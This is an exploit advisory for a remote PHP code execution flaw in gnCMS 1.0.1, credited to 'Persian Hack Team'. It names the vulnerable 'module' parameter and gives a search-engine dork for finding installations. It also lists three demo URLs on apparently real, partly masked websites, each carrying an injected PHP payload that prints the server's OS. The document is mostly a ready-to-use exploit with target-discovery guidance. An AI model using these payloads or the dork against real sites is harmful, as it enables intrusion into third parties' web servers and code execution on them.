######################
# Exploit Title : gnCMS Remote PHP Code Execution
# Exploit Author : Persian Hack Team
# Vendor Homepage : www.groupnet.gr
# Google Dork : "powered by gnCMS"
# Version : 1.0.1
# Date: 2015/12/19
#
######################
# PoC:
# Vulnerable Paramter module=
#
# Demo:
#
#http://www.myhbXa.gr/index.php?position=center&module=articles;${@print%28PHP_OS%29}&CategoryId=37
#http://www.bgXtr.eu/index.php?position=center&module=payform;${@print%28PHP_OS%29}&CategoryId=151
#http://www.myaXsfalia.gr/index.php?module=links;${@print%28PHP_OS%29}&position=center&CategoryId=21
#
#
######################
# Discovered by :
# Mojtaba MobhaM (kazemimojtaba@live.com)
# T3NZOG4N (t3nz0g4n@yahoo.com)
# Homepage : persian-team.ir
######################